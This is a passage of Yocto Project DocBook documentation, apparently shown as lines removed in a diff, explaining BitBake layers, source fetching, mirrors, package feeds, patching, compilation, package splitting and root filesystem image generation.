- BitBake uses the <filename>conf/bblayers.conf</filename> file,
- which is part of the user configuration, to find what layers it
- should be using as part of the build.
- </para>
-
- <section id="distro-layer">
- <title>Distro Layer</title>
-
- <para>
- The distribution layer provides policy configurations for
- your distribution.
- Best practices dictate that you isolate these types of
- configurations into their own layer.
- Settings you provide in
- <filename>conf/distro/<replaceable>distro</replaceable>.conf</filename> override
- similar settings that BitBake finds in your
- <filename>conf/local.conf</filename> file in the Build
- Directory.
- </para>
-
- <para>
- The following list provides some explanation and references
- for what you typically find in the distribution layer:
- <itemizedlist>
- <listitem><para>
- <emphasis>classes:</emphasis>
- Class files (<filename>.bbclass</filename>) hold
- common functionality that can be shared among
- recipes in the distribution.
- When your recipes inherit a class, they take on the
- settings and functions for that class.
- You can read more about class files in the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-classes'>Classes</ulink>"
- chapter of the Yocto Reference Manual.
- </para></listitem>
- <listitem><para>
- <emphasis>conf:</emphasis>
- This area holds configuration files for the
- layer (<filename>conf/layer.conf</filename>),
- the distribution
- (<filename>conf/distro/<replaceable>distro</replaceable>.conf</filename>),
- and any distribution-wide include files.
- </para></listitem>
- <listitem><para>
- <emphasis>recipes-*:</emphasis>
- Recipes and append files that affect common
- functionality across the distribution.
- This area could include recipes and append files
- to add distribution-specific configuration,
- initialization scripts, custom image recipes,
- and so forth.
- Examples of <filename>recipes-*</filename>
- directories are <filename>recipes-core</filename>
- and <filename>recipes-extra</filename>.
- Hierarchy and contents within a
- <filename>recipes-*</filename> directory can vary.
- Generally, these directories contain recipe files
- (<filename>*.bb</filename>), recipe append files
- (<filename>*.bbappend</filename>), directories
- that are distro-specific for configuration files,
- and so forth.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id="bsp-layer">
- <title>BSP Layer</title>
-
- <para>
- The BSP Layer provides machine configurations that
- target specific hardware.
- Everything in this layer is specific to the machine for
- which you are building the image or the SDK.
- A common structure or form is defined for BSP layers.
- You can learn more about this structure in the
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
- <note>
- In order for a BSP layer to be considered compliant
- with the Yocto Project, it must meet some structural
- requirements.
- </note>
- </para>
-
- <para>
- The BSP Layer's configuration directory contains
- configuration files for the machine
- (<filename>conf/machine/<replaceable>machine</replaceable>.conf</filename>)
- and, of course, the layer
- (<filename>conf/layer.conf</filename>).
- </para>
-
- <para>
- The remainder of the layer is dedicated to specific recipes
- by function: <filename>recipes-bsp</filename>,
- <filename>recipes-core</filename>,
- <filename>recipes-graphics</filename>,
- <filename>recipes-kernel</filename>, and so forth.
- Metadata can exist for multiple formfactors, graphics
- support systems, and so forth.
- <note>
- While the figure shows several
- <filename>recipes-*</filename> directories, not all
- these directories appear in all BSP layers.
- </note>
- </para>
- </section>
-
- <section id="software-layer">
- <title>Software Layer</title>
-
- <para>
- The software layer provides the Metadata for additional
- software packages used during the build.
- This layer does not include Metadata that is specific to
- the distribution or the machine, which are found in their
- respective layers.
- </para>
-
- <para>
- This layer contains any recipes, append files, and
- patches, that your project needs.
- </para>
- </section>
- </section>
-
- <section id="sources-dev-environment">
- <title>Sources</title>
-
- <para>
- In order for the OpenEmbedded build system to create an
- image or any target, it must be able to access source files.
- The
- <link linkend='general-workflow-figure'>general workflow figure</link>
- represents source files using the "Upstream Project Releases",
- "Local Projects", and "SCMs (optional)" boxes.
- The figure represents mirrors, which also play a role in
- locating source files, with the "Source Materials" box.
- </para>
-
- <para>
- The method by which source files are ultimately organized is
- a function of the project.
- For example, for released software, projects tend to use
- tarballs or other archived files that can capture the
- state of a release guaranteeing that it is statically
- represented.
- On the other hand, for a project that is more dynamic or
- experimental in nature, a project might keep source files in a
- repository controlled by a Source Control Manager (SCM) such as
- Git.
- Pulling source from a repository allows you to control
- the point in the repository (the revision) from which you
- want to build software.
- Finally, a combination of the two might exist, which would
- give the consumer a choice when deciding where to get
- source files.
- </para>
-
- <para>
- BitBake uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable to point to source files regardless of their location.
- Each recipe must have a <filename>SRC_URI</filename> variable
- that points to the source.
- </para>
-
- <para>
- Another area that plays a significant role in where source
- files come from is pointed to by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
- variable.
- This area is a cache that can hold previously downloaded
- source.
- You can also instruct the OpenEmbedded build system to create
- tarballs from Git repositories, which is not the default
- behavior, and store them in the <filename>DL_DIR</filename>
- by using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></ulink>
- variable.
- </para>
-
- <para>
- Judicious use of a <filename>DL_DIR</filename> directory can
- save the build system a trip across the Internet when looking
- for files.
- A good method for using a download directory is to have
- <filename>DL_DIR</filename> point to an area outside of your
- Build Directory.
- Doing so allows you to safely delete the Build Directory
- if needed without fear of removing any downloaded source file.
- </para>
-
- <para>
- The remainder of this section provides a deeper look into the
- source files and the mirrors.
- Here is a more detailed look at the source file area of the
- <link linkend='general-workflow-figure'>general workflow figure</link>:
- </para>
-
- <para>
- <imagedata fileref="figures/source-input.png" width="6in" depth="6in" align="center" />
- </para>
-
- <section id='upstream-project-releases'>
- <title>Upstream Project Releases</title>
-
- <para>
- Upstream project releases exist anywhere in the form of an
- archived file (e.g. tarball or zip file).
- These files correspond to individual recipes.
- For example, the figure uses specific releases each for
- BusyBox, Qt, and Dbus.
- An archive file can be for any released product that can be
- built using a recipe.
- </para>
- </section>
-
- <section id='local-projects'>
- <title>Local Projects</title>
-
- <para>
- Local projects are custom bits of software the user
- provides.
- These bits reside somewhere local to a project - perhaps
- a directory into which the user checks in items (e.g.
- a local directory containing a development source tree
- used by the group).
- </para>
-
- <para>
- The canonical method through which to include a local
- project is to use the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-externalsrc'><filename>externalsrc</filename></ulink>
- class to include that local project.
- You use either the <filename>local.conf</filename> or a
- recipe's append file to override or set the
- recipe to point to the local directory on your disk to pull
- in the whole source tree.
- </para>
- </section>
-
- <section id='scms'>
- <title>Source Control Managers (Optional)</title>
-
- <para>
- Another place from which the build system can get source
- files is with
- <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetchers</ulink>
- employing various Source Control Managers (SCMs) such as
- Git or Subversion.
- In such cases, a repository is cloned or checked out.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>
- task inside BitBake uses
- the <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable and the argument's prefix to determine the correct
- fetcher module.
- <note>
- For information on how to have the OpenEmbedded build
- system generate tarballs for Git repositories and place
- them in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
- directory, see the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></ulink>
- variable in the Yocto Project Reference Manual.
- </note>
- </para>
-
- <para>
- When fetching a repository, BitBake uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
- variable to determine the specific revision from which to
- build.
- </para>
- </section>
-
- <section id='source-mirrors'>
- <title>Source Mirror(s)</title>
-
- <para>
- Two kinds of mirrors exist: pre-mirrors and regular
- mirrors.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREMIRRORS'><filename>PREMIRRORS</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MIRRORS'><filename>MIRRORS</filename></ulink>
- variables point to these, respectively.
- BitBake checks pre-mirrors before looking upstream for any
- source files.
- Pre-mirrors are appropriate when you have a shared
- directory that is not a directory defined by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
- variable.
- A Pre-mirror typically points to a shared directory that is
- local to your organization.
- </para>
-
- <para>
- Regular mirrors can be any site across the Internet
- that is used as an alternative location for source
- code should the primary site not be functioning for
- some reason or another.
- </para>
- </section>
- </section>
-
- <section id="package-feeds-dev-environment">
- <title>Package Feeds</title>
-
- <para>
- When the OpenEmbedded build system generates an image or an
- SDK, it gets the packages from a package feed area located
- in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- The
- <link linkend='general-workflow-figure'>general workflow figure</link>
- shows this package feeds area in the upper-right corner.
- </para>
-
- <para>
- This section looks a little closer into the package feeds
- area used by the build system.
- Here is a more detailed look at the area:
- <imagedata fileref="figures/package-feeds.png" align="center" width="7in" depth="6in" />
- </para>
-
- <para>
- Package feeds are an intermediary step in the build process.
- The OpenEmbedded build system provides classes to generate
- different package types, and you specify which classes to
- enable through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
- variable.
- Before placing the packages into package feeds,
- the build process validates them with generated output quality
- assurance checks through the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-insane'><filename>insane</filename></ulink>
- class.
- </para>
-
- <para>
- The package feed area resides in the Build Directory.
- The directory the build system uses to temporarily store
- packages is determined by a combination of variables and the
- particular package manager in use.
- See the "Package Feeds" box in the illustration and note the
- information to the right of that area.
- In particular, the following defines where package files are
- kept:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></ulink>:
- Defined as <filename>tmp/deploy</filename> in the Build
- Directory.
- </para></listitem>
- <listitem><para>
- <filename>DEPLOY_DIR_*</filename>:
- Depending on the package manager used, the package type
- sub-folder.
- Given RPM, IPK, or DEB packaging and tarball creation,
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_RPM'><filename>DEPLOY_DIR_RPM</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_IPK'><filename>DEPLOY_DIR_IPK</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_DEB'><filename>DEPLOY_DIR_DEB</filename></ulink>,
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_TAR'><filename>DEPLOY_DIR_TAR</filename></ulink>,
- variables are used, respectively.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>:
- Defines architecture-specific sub-folders.
- For example, packages could exist for the i586 or
- qemux86 architectures.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- BitBake uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write_*</filename></ulink>
- tasks to generate packages and place them into the package
- holding area (e.g. <filename>do_package_write_ipk</filename>
- for IPK packages).
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write_deb</filename></ulink>",
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_ipk'><filename>do_package_write_ipk</filename></ulink>",
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_rpm'><filename>do_package_write_rpm</filename></ulink>",
- and
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_tar'><filename>do_package_write_tar</filename></ulink>"
- sections in the Yocto Project Reference Manual
- for additional information.
- As an example, consider a scenario where an IPK packaging
- manager is being used and package architecture support for
- both i586 and qemux86 exist.
- Packages for the i586 architecture are placed in
- <filename>build/tmp/deploy/ipk/i586</filename>, while packages
- for the qemux86 architecture are placed in
- <filename>build/tmp/deploy/ipk/qemux86</filename>.
- </para>
- </section>
-
- <section id='bitbake-dev-environment'>
- <title>BitBake</title>
-
- <para>
- The OpenEmbedded build system uses
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- to produce images and Software Development Kits (SDKs).
- You can see from the
- <link linkend='general-workflow-figure'>general workflow figure</link>,
- the BitBake area consists of several functional areas.
- This section takes a closer look at each of those areas.
- <note>
- Separate documentation exists for the BitBake tool.
- See the
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>
- for reference material on BitBake.
- </note>
- </para>
-
- <section id='source-fetching-dev-environment'>
- <title>Source Fetching</title>
-
- <para>
- The first stages of building a recipe are to fetch and
- unpack the source code:
- <imagedata fileref="figures/source-fetching.png" align="center" width="6.5in" depth="5in" />
- </para>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>
- tasks fetch the source files and unpack them into the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- <note>
- For every local file (e.g. <filename>file://</filename>)
- that is part of a recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statement, the OpenEmbedded build system takes a
- checksum of the file for the recipe and inserts the
- checksum into the signature for the
- <filename>do_fetch</filename> task.
- If any local file has been modified, the
- <filename>do_fetch</filename> task and all tasks that
- depend on it are re-executed.
- </note>
- By default, everything is accomplished in the Build
- Directory, which has a defined structure.
- For additional general information on the Build Directory,
- see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#structure-core-build'><filename>build/</filename></ulink>"
- section in the Yocto Project Reference Manual.
- </para>
-
- <para>
- Each recipe has an area in the Build Directory where the
- unpacked source code resides.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
- variable points to this area for a recipe's unpacked source
- code.
- The name of that directory for any given recipe is defined
- from several different variables.
- The preceding figure and the following list describe
- the Build Directory's hierarchy:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>:
- The base directory where the OpenEmbedded build
- system performs all its work during the build.
- The default base directory is the
- <filename>tmp</filename> directory.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>:
- The architecture of the built package or packages.
- Depending on the eventual destination of the
- package or packages (i.e. machine architecture,
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>,
- SDK, or specific machine),
- <filename>PACKAGE_ARCH</filename> varies.
- See the variable's description for details.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TARGET_OS'><filename>TARGET_OS</filename></ulink>:
- The operating system of the target device.
- A typical value would be "linux" (e.g.
- "qemux86-poky-linux").
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>:
- The name of the recipe used to build the package.
- This variable can have multiple meanings.
- However, when used in the context of input files,
- <filename>PN</filename> represents the the name
- of the recipe.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>:
- The location where the OpenEmbedded build system
- builds a recipe (i.e. does the work to create the
- package).
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>:
- The version of the recipe used to build the
- package.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>:
- The revision of the recipe used to build the
- package.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>:
- Contains the unpacked source files for a given
- recipe.
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BPN'><filename>BPN</filename></ulink>:
- The name of the recipe used to build the
- package.
- The <filename>BPN</filename> variable is
- a version of the <filename>PN</filename>
- variable but with common prefixes and
- suffixes removed.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>:
- The version of the recipe used to build the
- package.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </itemizedlist>
- <note>
- In the previous figure, notice that two sample
- hierarchies exist: one based on package architecture (i.e.
- <filename>PACKAGE_ARCH</filename>) and one based on a
- machine (i.e. <filename>MACHINE</filename>).
- The underlying structures are identical.
- The differentiator being what the OpenEmbedded build
- system is using as a build target (e.g. general
- architecture, a build host, an SDK, or a specific
- machine).
- </note>
- </para>
- </section>
-
- <section id='patching-dev-environment'>
- <title>Patching</title>
-
- <para>
- Once source code is fetched and unpacked, BitBake locates
- patch files and applies them to the source files:
- <imagedata fileref="figures/patching.png" align="center" width="7in" depth="6in" />
- </para>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
- task uses a recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statements and the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
- variable to locate applicable patch files.
- </para>
-
- <para>
- Default processing for patch files assumes the files have
- either <filename>*.patch</filename> or
- <filename>*.diff</filename> file types.
- You can use <filename>SRC_URI</filename> parameters to
- change the way the build system recognizes patch files.
- See the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
- task for more information.
- </para>
-
- <para>
- BitBake finds and applies multiple patches for a single
- recipe in the order in which it locates the patches.
- The <filename>FILESPATH</filename> variable defines the
- default set of directories that the build system uses to
- search for patch files.
- Once found, patches are applied to the recipe's source
- files, which are located in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
- directory.
- </para>
-
- <para>
- For more information on how the source directories are
- created, see the
- "<link linkend='source-fetching-dev-environment'>Source Fetching</link>"
- section.
- For more information on how to create patches and how the
- build system processes patches, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-patching-code'>Patching Code</ulink>"
- section in the Yocto Project Development Tasks Manual.
- You can also see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component'>Use <filename>devtool modify</filename> to Modify the Source of an Existing Component</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (SDK) manual and
- the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</ulink>"
- section in the Yocto Project Linux Kernel Development
- Manual.
- </para>
- </section>
-
- <section id='configuration-compilation-and-staging-dev-environment'>
- <title>Configuration, Compilation, and Staging</title>
-
- <para>
- After source code is patched, BitBake executes tasks that
- configure and compile the source code.
- Once compilation occurs, the files are copied to a holding
- area (staged) in preparation for packaging:
- <imagedata fileref="figures/configuration-compile-autoreconf.png" align="center" width="7in" depth="5in" />
- </para>
-
- <para>
- This step in the build process consists of the following
- tasks:
- <itemizedlist>
- <listitem><para>
- <emphasis><ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-prepare_recipe_sysroot'><filename>do_prepare_recipe_sysroot</filename></ulink></emphasis>:
- This task sets up the two sysroots in
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}</filename>
- (i.e. <filename>recipe-sysroot</filename> and
- <filename>recipe-sysroot-native</filename>) so that
- during the packaging phase the sysroots can contain
- the contents of the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
- tasks of the recipes on which the recipe
- containing the tasks depends.
- A sysroot exists for both the target and for the
- native binaries, which run on the host system.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>do_configure</filename></emphasis>:
- This task configures the source by enabling and
- disabling any build-time and configuration options
- for the software being built.
- Configurations can come from the recipe itself as
- well as from an inherited class.
- Additionally, the software itself might configure
- itself depending on the target for which it is
- being built.</para>
-
- <para>The configurations handled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
- task are specific to configurations for the source
- code being built by the recipe.</para>
-
- <para>If you are using the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
- class, you can add additional configuration options
- by using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></ulink>
- variables.
- For information on how this variable works within
- that class, see the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
- class
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/classes/autotools.bbclass'>here</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>do_compile</filename></emphasis>:
- Once a configuration task has been satisfied,
- BitBake compiles the source using the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
- task.
- Compilation occurs in the directory pointed to by
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-B'><filename>B</filename></ulink>
- variable.
- Realize that the <filename>B</filename> directory
- is, by default, the same as the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
- directory.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>do_install</filename></emphasis>:
- After compilation completes, BitBake executes the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task.
- This task copies files from the
- <filename>B</filename> directory and places them
- in a holding area pointed to by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink>
- variable.
- Packaging occurs later using files from this
- holding directory.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='package-splitting-dev-environment'>
- <title>Package Splitting</title>
-
- <para>
- After source code is configured, compiled, and staged, the
- build system analyzes the results and splits the output
- into packages:
- <imagedata fileref="figures/analysis-for-package-splitting.png" align="center" width="7in" depth="7in" />
- </para>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-packagedata'><filename>do_packagedata</filename></ulink>
- tasks combine to analyze the files found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink>
- directory and split them into subsets based on available
- packages and files.
- Analysis involves the following as well as other items:
- splitting out debugging symbols, looking at shared library
- dependencies between packages, and looking at package
- relationships.
- </para>
-
- <para>
- The <filename>do_packagedata</filename> task creates
- package metadata based on the analysis such that the
- build system can generate the final packages.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
- task stages (copies) a subset of the files installed by
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task into the appropriate sysroot.
- Working, staged, and intermediate results of the analysis
- and package splitting process use several areas:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGD'><filename>PKGD</filename></ulink>:
- The destination directory
- (i.e. <filename>package</filename>) for packages
- before they are split into individual packages.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDESTWORK'><filename>PKGDESTWORK</filename></ulink>:
- A temporary work area (i.e.
- <filename>pkgdata</filename>) used by the
- <filename>do_package</filename> task to save
- package metadata.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDEST'><filename>PKGDEST</filename></ulink>:
- The parent directory (i.e.
- <filename>packages-split</filename>) for packages
- after they have been split.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></ulink>:
- A shared, global-state directory that holds
- packaging metadata generated during the packaging
- process.
- The packaging process copies metadata from
- <filename>PKGDESTWORK</filename> to the
- <filename>PKGDATA_DIR</filename> area where it
- becomes globally available.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></ulink>:
- The path for the sysroot for the system on which
- a component is built to run (i.e.
- <filename>recipe-sysroot</filename>).
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DIR_NATIVE'><filename>STAGING_DIR_NATIVE</filename></ulink>:
- The path for the sysroot used when building
- components for the build host (i.e.
- <filename>recipe-sysroot-native</filename>).
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_DIR_TARGET'><filename>STAGING_DIR_TARGET</filename></ulink>:
- The path for the sysroot used when a component that
- is built to execute on a system and it generates
- code for yet another machine (e.g. cross-canadian
- recipes).
- </para></listitem>
- </itemizedlist>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>
- variable defines the files that go into each package in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>.
- If you want details on how this is accomplished, you can
- look at
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/classes/package.bbclass'><filename>package.bbclass</filename></ulink>.
- </para>
-
- <para>
- Depending on the type of packages being created (RPM, DEB,
- or IPK), the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write_*</filename></ulink>
- task creates the actual packages and places them in the
- Package Feed area, which is
- <filename>${TMPDIR}/deploy</filename>.
- You can see the
- "<link linkend='package-feeds-dev-environment'>Package Feeds</link>"
- section for more detail on that part of the build process.
- <note>
- Support for creating feeds directly from the
- <filename>deploy/*</filename> directories does not
- exist.
- Creating such feeds usually requires some kind of feed
- maintenance mechanism that would upload the new
- packages into an official package feed (e.g. the
- Ångström distribution).
- This functionality is highly distribution-specific
- and thus is not provided out of the box.
- </note>
- </para>
- </section>
-
- <section id='image-generation-dev-environment'>
- <title>Image Generation</title>
-
- <para>
- Once packages are split and stored in the Package Feeds
- area, the build system uses BitBake to generate the root
- filesystem image:
- <imagedata fileref="figures/image-generation.png" align="center" width="7.5in" depth="7.5in" />
- </para>
-
- <para>
- The image generation process consists of several stages and
- depends on several tasks and variables.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-rootfs'><filename>do_rootfs</filename></ulink>
- task creates the root filesystem (file and directory
- structure) for an image.
- This task uses several key variables to help create the
- list of packages to actually install:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>:
- Lists out the base set of packages from which to
- install from the Package Feeds area.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></ulink>:
- Specifies packages that should not be installed
- into the image.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>:
- Specifies features to include in the image.
- Most of these features map to additional packages
- for installation.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>:
- Specifies the package backend (e.g. RPM, DEB, or
- IPK) to use and consequently helps determine where
- to locate packages within the Package Feeds area.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_LINGUAS'><filename>IMAGE_LINGUAS</filename></ulink>:
- Determines the language(s) for which additional
- language support packages are installed.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_INSTALL'><filename>PACKAGE_INSTALL</filename></ulink>:
- The final list of packages passed to the package
- manager for installation into the image.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- With
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></ulink>
- pointing to the location of the filesystem under
- construction and the <filename>PACKAGE_INSTALL</filename>
- variable providing the final list of packages to install,
- the root file system is created.
- </para>
-
- <para>
- Package installation is under control of the package
- manager (e.g. dnf/rpm, opkg, or apt/dpkg) regardless of
- whether or not package management is enabled for the
- target.
- At the end of the process, if package management is not
- enabled for the target, the package manager's data files
- are deleted from the root filesystem.
- As part of the final stage of package installation,
- post installation scripts that are part of the packages
- are run.
- Any scripts that fail to run on the build host are run on
- the target when the target system is first booted.
- If you are using a
- <ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-read-only-root-filesystem'>read-only root filesystem</ulink>,
- all the post installation scripts must succeed on the
- build host during the package installation phase since the
- root filesystem on the target is read-only.
- </para>
-
- <para>
- The final stages of the <filename>do_rootfs</filename> task
- handle post processing.
- Post processing includes creation of a manifest file and
- optimizations.
- </para>
-
- <para>
- The manifest file (<filename>.manifest</filename>) resides
